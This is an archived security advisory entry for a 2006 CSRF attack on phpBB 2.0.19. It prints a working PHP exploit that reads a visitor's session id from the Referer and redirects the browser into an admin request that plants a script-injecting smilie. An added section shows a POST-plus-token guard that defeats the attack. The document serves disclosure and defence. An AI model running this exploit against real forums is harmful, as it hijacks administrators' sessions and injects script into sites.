Details : SecurityReason Exploit

  Topic : phpBB 2.0.19 CSRF Image
  ExploitAlert : 6
  Credit : Maksymilian Arciemowicz
  Date : 8.2.2006

  Exploit Code :  

<?php
# SecurityReason.Com written by Maksymilian Arciemowicz
# http://securityreason.com/achievement_securityalert/31 or GPG
# http://securityreason.com/achievement_securityalert/31/1
#
# post :x: to see xss OR set request for admin
#
# The script is the target of an <img> tag. A phpBB 2.0.19 visitor's browser
# sends the forum URL, session id in the query string included, as the Referer.

$sid='';
$url = parse_url(getenv('HTTP_REFERER'));

# forum directory from the referring path, session id from its query string
preg_match('/(\/.*)\//', $url['path'], $path);
preg_match('#sid\=?([0-9a-z]*)#i', isset($url['query']) ? $url['query'] : '', $sid);

if(!isset($sid[1]) || $sid[1]==""){

# no session id in the Referer: return a real GIF so the tag simply renders an image
$image="R0lGODlhUABQAIcAAAAAAAEBAQMDAwQEBAYGBgcHBwgICAkJCQoKCgsLCwwMDA0..."; # base64 GIF data truncated in this archive copy

header('Content-type: image/gif');

echo base64_decode($image);
exit;

} else {

# session id present: redirect the browser to the admin smilie form carrying the
# visitor's own sid, so the request is processed under that visitor's session
header("Location: ".$url['scheme']."://".$url['host'].$path[0]."admin_smilies.php?mode=savenew&smile_code=:x:&smile_url=icon_mrgreen.gif&smile_emotion=c\"%20onmouseover=\"alert('SecurityReason.Com')\"%20&sid=".$sid[1]); # REQUEST!

}
?>
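The redirect above succeeds because the only credential the admin action checks is the sid, which the Referer hands to a third party and which a GET can carry. Below is an added example, not part of the original exploit or of phpBB, showing the guard that defeats it: a per-session token that never appears in a URL and must arrive by POST. Function names, the session array and the sample requests are assumptions constructed for illustration.

```php
<?php
// Added example (not from the exploit or phpBB): anti-CSRF guard for a
// state-changing admin action such as admin_smilies.php?mode=savenew.
// Names are hypothetical; $session stands in for a server-side session store.

// Issue one random token per session and keep it server-side. It is echoed only
// into the admin's own forms, so it never reaches a Referer header.
function csrf_token(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Decide whether a request may perform the action. The image/redirect trick on
// this page can only produce a GET that carries the sid; it cannot add a POST
// body, and it cannot learn a token that was never placed in a URL.
function admin_action_allowed(string $method, array $post, array $session): bool {
    if ($method !== 'POST') {
        return false;                       // reject GET-driven state changes outright
    }
    if (!isset($post['csrf_token'], $session['csrf_token'])) {
        return false;                       // missing token on either side
    }
    // constant-time comparison of the submitted and stored tokens
    return hash_equals($session['csrf_token'], (string) $post['csrf_token']);
}

// Constructed sample requests. The first mirrors the forged GET the exploit
// issues (sid only, no body); the second is the admin submitting the real form.
$session = [];
$token   = csrf_token($session);

$forged = ['method' => 'GET',  'post' => []];
$legit  = ['method' => 'POST', 'post' => ['csrf_token' => $token,
                                           'smile_code' => ':x:']];

var_dump(admin_action_allowed($forged['method'], $forged['post'], $session));
var_dump(admin_action_allowed($legit['method'],  $legit['post'],  $session));
```

Checking the Referer or Origin header is a useful second layer, but it is not a substitute: the token is what stops a request that arrives with a valid sid and a plausible referring page.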